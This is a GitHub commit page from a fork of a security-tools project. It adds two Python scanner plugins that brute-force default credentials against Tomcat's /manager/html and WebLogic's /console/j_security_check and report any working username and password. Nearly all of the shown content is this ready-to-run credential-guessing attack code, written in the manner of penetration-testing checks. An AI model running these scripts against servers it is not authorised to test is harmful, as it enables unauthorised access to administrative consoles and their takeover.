forked from iceyhexman/onlinetools
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
21d3310
commit b67862f
Showing
15 changed files
with
480 additions
and
1,000 deletions.
There are no files selected for viewing
Large diffs are not rendered by default.
Oops, something went wrong.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,39 @@ | ||
#!/usr/bin/env python | ||
# -*- coding: utf-8 -*- | ||
''' | ||
name: Tomcat 弱口令漏洞 | ||
referer: unknown | ||
author: Lucifer | ||
description: tomcat 后台弱口令。 | ||
''' | ||
|
||
import json | ||
import base64 | ||
import requests | ||
|
||
class tomcat_weak_pass_BaseVerify: | ||
def __init__(self, url): | ||
self.url = url | ||
|
||
def run(self): | ||
userlist = ["tomcat","admin"] | ||
passlist = ["tomcat", "123456", "admin"] | ||
payload = "/manager/html" | ||
vulnurl = self.url + payload | ||
for username in userlist: | ||
for password in passlist: | ||
try: | ||
headers = { | ||
"Authorization":"Basic "+base64.b64encode(bytes(username.encode())+b":"+bytes(password.encode())).decode(), | ||
"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8", | ||
"User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" | ||
} | ||
req = requests.get(vulnurl, headers=headers, timeout=10, verify=False) | ||
if req.status_code == 200 and r"Applications" in req.text and r"Manager" in req.text: | ||
return "[+]存在Tomcat 弱口令漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps({username:password}, indent=4) | ||
else: | ||
return "no vuln" | ||
|
||
except: | ||
return "[-] ====>连接超时" | ||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,39 @@ | ||
#!/usr/bin/env python | ||
# -*- coding: utf-8 -*- | ||
''' | ||
name: weblogic 弱口令漏洞 | ||
referer: unknown | ||
author: Lucifer | ||
description: weblogic 后台弱口令 | ||
''' | ||
|
||
import json | ||
import requests | ||
|
||
|
||
class weblogic_weak_pass_BaseVerify: | ||
def __init__(self, url): | ||
self.url = url | ||
|
||
def run(self): | ||
headers = { | ||
"User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50", | ||
"Content-Type":"application/x-www-form-urlencoded" | ||
} | ||
payload = "/console/j_security_check" | ||
passwd = ["weblogic", "weblogic1", "weblogic12", "weblogic123"] | ||
vulnurl = self.url + payload | ||
for pwd in passwd: | ||
post_data = { | ||
"j_username":"weblogic", | ||
"j_password":pwd | ||
} | ||
try: | ||
req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False, allow_redirects=False) | ||
if req.status_code == 302 and r"console" in req.text and r"LoginForm.jsp" not in req.text: | ||
return "[+]存在weblogic 弱口令漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4) | ||
else: | ||
return "no vuln" | ||
|
||
except: | ||
return "[-] ====>连接超时" |
Large diffs are not rendered by default.
Oops, something went wrong.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Oops, something went wrong.